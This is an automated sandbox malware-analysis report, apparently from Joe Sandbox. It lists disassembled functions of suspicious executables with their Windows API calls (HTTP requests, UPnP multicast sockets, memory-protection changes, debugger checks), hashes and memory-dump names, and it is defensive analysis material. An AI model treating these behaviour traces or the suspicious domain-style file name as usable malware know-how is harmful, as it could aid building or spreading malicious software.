Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8

SysFreeString.OLEAUT32(00000000), ref: 004073C2

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID:
API String ID: 459949847-0
Opcode ID: 1fd9ec75af09a2bfc6b11ac1f1b7de3f53f2b1ac24a434a5a41d4fe45e8a76fc
Instruction ID: 8f6b8c512ea5d30b0d7755d5730098b314a85d445d66f7e86a23d23f7813c5b7
Opcode Fuzzy Hash: 1fd9ec75af09a2bfc6b11ac1f1b7de3f53f2b1ac24a434a5a41d4fe45e8a76fc
Instruction Fuzzy Hash: 49E01A75944208FBD744ABE0ED0EB9DB768AB05301F1085A5FD05A22A0DAF96E80DB5A

Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690

SysFreeString.OLEAUT32(00000000), ref: 004075F8

Strings

Microsoft Corporation, xrefs: 00407566

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66

Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837

Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621

SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
SysFreeString.OLEAUT32(00000000), ref: 0040E4E5

Strings

%S%S, xrefs: 0040E4C6

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1

Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA

Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285

Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5

Strings

UDP, xrefs: 0040E158
TCP, xrefs: 0040E13B

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: cce90aafcdbc0f30cba6e9bff8725eec2aa89270c6e229fed3994795222e2490
Instruction ID: 2437caf2f87e23d634fe6678ed8ca89839758ed3c5b507959b22ae4370e49aff
Opcode Fuzzy Hash: cce90aafcdbc0f30cba6e9bff8725eec2aa89270c6e229fed3994795222e2490
Instruction Fuzzy Hash: 7611B4B4E00208EBDB04EFD5DC49BAE7375AB44708F10886AE5007B2C2E6785E21CB89

Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00418C40,?,00000000,?), ref: 00405EFF
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
LeaveCriticalSection.KERNEL32(00418C40), ref: 00405FD0

Memory Dump Source

Source File: 00000004.00000002.1908070209.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1907064799.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1908439539.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.1909104615.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_http185.jbxd

Yara matches

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: cb6783895dfe134ced12b4e4a78cb89b7442cc9a815adf22f5618a6820274b39
Instruction ID: c8e9498b7972dcbb7bf834d88dc97bf180ad15028c2f3797ff98905d67a2d4e9
Opcode Fuzzy Hash: cb6783895dfe134ced12b4e4a78cb89b7442cc9a815adf22f5618a6820274b39
Instruction Fuzzy Hash: 68216D71E04209ABDB05DB94D885BDEBB71EB44304F14C1BAE80567381DB7CA985CF9A

Analysis Process: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exePID: 7112, Parent PID: 6936COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.9%
Total number of Nodes:	229
Total number of Limit Nodes:	5

Executed Functions

Function 00EE20AD Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 755
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00F68CE0,000004E4,00000040,?), ref: 00EE293D

Strings

N, xrefs: 00EE28B2

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: N
API String ID: 544645111-1130791706
Opcode ID: 51a36ab466b838d31bdb0000e2a3736afc5dccc5c93af861f7c00b517378dabb
Instruction ID: fb07dda08e113cdb3d03078cb870663dbbcff689ef2c168451ed881b6996f46a
Opcode Fuzzy Hash: 51a36ab466b838d31bdb0000e2a3736afc5dccc5c93af861f7c00b517378dabb
Instruction Fuzzy Hash: BB02CD1BA34D5F02E30C683A8D132E1950ED7EA760F55733BAB67B76F4E25A09429284

Function 00EF7996 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,00EF7BE5,00EF7BD9,00000000), ref: 00EF79C8

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 3f0ce04d7200cc9ca17c65b76fa6bf95d08bfebfd686054674ac511ff519d971
Instruction ID: 7edf70f53f8d43d6a1848535145d1c0fd2ebf934ed10620fe69e59f85ca532f4
Opcode Fuzzy Hash: 3f0ce04d7200cc9ca17c65b76fa6bf95d08bfebfd686054674ac511ff519d971
Instruction Fuzzy Hash: 6B513B7150815C9EDB218F28CC84AFA7BB9EB55304F2415EDD6DAE7142D370AE45DF20

Function 00EF5E36 Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 00EF5EBD
__alloca_probe_16.LIBCMT ref: 00EF5F7E
__freea.LIBCMT ref: 00EF5FE5

Part of subcall function 00EF4F08: HeapAlloc.KERNEL32(00000000,00000000,?,?,00EE7C05,?,?,?,?,?,00EE119C,?,00000001), ref: 00EF4F3A

__freea.LIBCMT ref: 00EF5FFA
__freea.LIBCMT ref: 00EF600A

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 4f929b61ee08c3faf465638d2979be4b06be0d40f65e809cc255e110db843ec5
Instruction ID: fdf66d6edc4f8cc788717055c468dda377ef7a23967e55a79123fadbcdd27217
Opcode Fuzzy Hash: 4f929b61ee08c3faf465638d2979be4b06be0d40f65e809cc255e110db843ec5
Instruction Fuzzy Hash: 5851BF7360060EABEF219EA5DC41DBB7AE9EF54358B2511A9FF04F6151EB30CD108660

Function 00EF2179 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00EF5F24,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00EF21AD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00EF5F24,?,?,00000000,?,00000000), ref: 00EF21CB

Strings

C, xrefs: 00EF21A7

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: String
String ID: C
API String ID: 2568140703-2531096973
Opcode ID: 8be40184535e6cbe94e213fbb80df9e26bcf2ca37249f08715862e95bb8bd624
Instruction ID: 873e2128667b95726c3e17ac549283e46cffc91857cb468bf9de31a73c528655
Opcode Fuzzy Hash: 8be40184535e6cbe94e213fbb80df9e26bcf2ca37249f08715862e95bb8bd624
Instruction Fuzzy Hash: 10F0643250115EFBCF126F91EC05DEE3E66BB483A4B059014FF1865120CB32D871EB95

Function 00EF7D92 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF78C2: GetOEMCP.KERNEL32(00000000,?,?,00000016,?), ref: 00EF78ED

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00EF7BD9,?,00000000,?,00000016,?), ref: 00EF7DF3
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00EF7BD9,?,00000000,?,00000016,?), ref: 00EF7E35

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 8c7c1e28a726688a979288fd998e450b2ead86d7282c89439b90371cb5cbe5bb
Instruction ID: 8a1e9f59f61bb255efaf2905808e6818bd46901b96540996f0e792165cac4741
Opcode Fuzzy Hash: 8c7c1e28a726688a979288fd998e450b2ead86d7282c89439b90371cb5cbe5bb
Instruction Fuzzy Hash: 30513771A083498EDB20CF35C8816BABBF5EF41308F1464AFD2C6A7251E7B49D06CB50

Non-executed Functions

Function 00EFA200 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00EFA51E,00000002,00000000,?,?,?,00EFA51E,?,00000000), ref: 00EFA299
GetLocaleInfoW.KERNEL32(?,20001004,00EFA51E,00000002,00000000,?,?,?,00EFA51E,?,00000000), ref: 00EFA2C2
GetACP.KERNEL32(?,?,00EFA51E,?,00000000), ref: 00EFA2D7

Strings

OCP, xrefs: 00EFA254
ACP, xrefs: 00EFA21E

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 7a8e6bfa3a924eed4a1b60af4d99db33f61a5a5d9409060e95affbe6499a3da3
Instruction ID: 37cd39d402405583d882fd0e1be5b4904a62577ff6081139845c341f8fa98483
Opcode Fuzzy Hash: 7a8e6bfa3a924eed4a1b60af4d99db33f61a5a5d9409060e95affbe6499a3da3
Instruction Fuzzy Hash: 702153A1700109AAFB348F55C905AB772A6AB50B58B5E9434EB0EFF125F733DE40D352

Function 00EFA3D5 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EF189A: GetLastError.KERNEL32(?,00000000,00EEE1EF,?,?,?,?,00000003,00EEB735,?,00EEB6A4,00000000,00000016,00EEB8B3), ref: 00EF189E
Part of subcall function 00EF189A: SetLastError.KERNEL32(00000000,00000016,00EEB8B3,?,?,?,?,?,00000000), ref: 00EF1940

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EFA4E1
IsValidCodePage.KERNEL32(00000000), ref: 00EFA52A
IsValidLocale.KERNEL32(?,?), ref: 00EFA539
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EFA581
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EFA5A0

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 27090014041f0426dc549fd55eda212bb013445ad1639b7c3050c8ad890c357c
Instruction ID: 7c6452f9638021e4d06726f1c26743d3af188a3aaa32bbe5c7886cfbb9d6b1e8
Opcode Fuzzy Hash: 27090014041f0426dc549fd55eda212bb013445ad1639b7c3050c8ad890c357c
Instruction Fuzzy Hash: D85153B1A0020DAFDB10DFA5CC45ABE73B8BF44704F185479EA19FB191EBB09944C762

Function 00EF9A71 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EF189A: GetLastError.KERNEL32(?,00000000,00EEE1EF,?,?,?,?,00000003,00EEB735,?,00EEB6A4,00000000,00000016,00EEB8B3), ref: 00EF189E
Part of subcall function 00EF189A: SetLastError.KERNEL32(00000000,00000016,00EEB8B3,?,?,?,?,?,00000000), ref: 00EF1940

GetACP.KERNEL32(?,?,?,?,?,?,00EEF906,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EF9B32
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00EEF906,?,?,?,00000055,?,-00000050,?,?), ref: 00EF9B5D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EF9CC0

Strings

utf8, xrefs: 00EF9C2F

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: bd6fc996839639c9570f75c8bc59e1266c2df1d0fe4720e5fb1d16082f019c91
Instruction ID: def2bd80156db800b96a32d5d748f561ad912a6ec585f21f2e558882533e2991
Opcode Fuzzy Hash: bd6fc996839639c9570f75c8bc59e1266c2df1d0fe4720e5fb1d16082f019c91
Instruction Fuzzy Hash: 1371E57160060EAADB28AB35DC86BB6B3E8EF45344F145429F789F7182FB70E940C761

Function 00EE78F8 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00EE7904
IsDebuggerPresent.KERNEL32 ref: 00EE79D0
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EE79E9
UnhandledExceptionFilter.KERNEL32(?), ref: 00EE79F3

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 2853b196fc6fb162aa4e71ea5c65e5e80ae8c3dc15864867a250e9f84a57021d
Instruction ID: 138aac7b895821fa90543919661a243fe239a0942f036c3dee584b86bf9199d4
Opcode Fuzzy Hash: 2853b196fc6fb162aa4e71ea5c65e5e80ae8c3dc15864867a250e9f84a57021d
Instruction Fuzzy Hash: E331D775D0525C9FDB21DFA5D949BCDBBB8AF08304F1041AAE40DAB250EBB19B84CF45

Function 00F0907E Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd161ad71b083437cb9e7b5467f0ba713d648eb94ba202ec0c01540f5fd4838
Instruction ID: a164360f181282073dbabbbbd6b7eb843cc4191de888814747e2c35ce5d9847a
Opcode Fuzzy Hash: 7fd161ad71b083437cb9e7b5467f0ba713d648eb94ba202ec0c01540f5fd4838
Instruction Fuzzy Hash: 95217DB5D0020A8FCB04CFA9D4816EEFBF4BB48320F50846ACA56B3350E634AA458F94

Function 00F0938D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2087219943.0000000000F08000.00000004.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000005.00000002.2087077961.0000000000EE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087187784.0000000000EFE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087275999.0000000000F68000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087312278.0000000000F6A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2087339767.0000000000F6B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ee0000_httpjask.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: d0ff23020fae2baba83a21ada0547848b5e8e3094c5235fdb08ceda9426d4680
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: 5AF05832A08104EBCB21CF59E804BAAFBB8EB43370F253054E509B3281D370ED10FA98

Function 00EF8038 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2087113905.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EE0000, based on PE: true

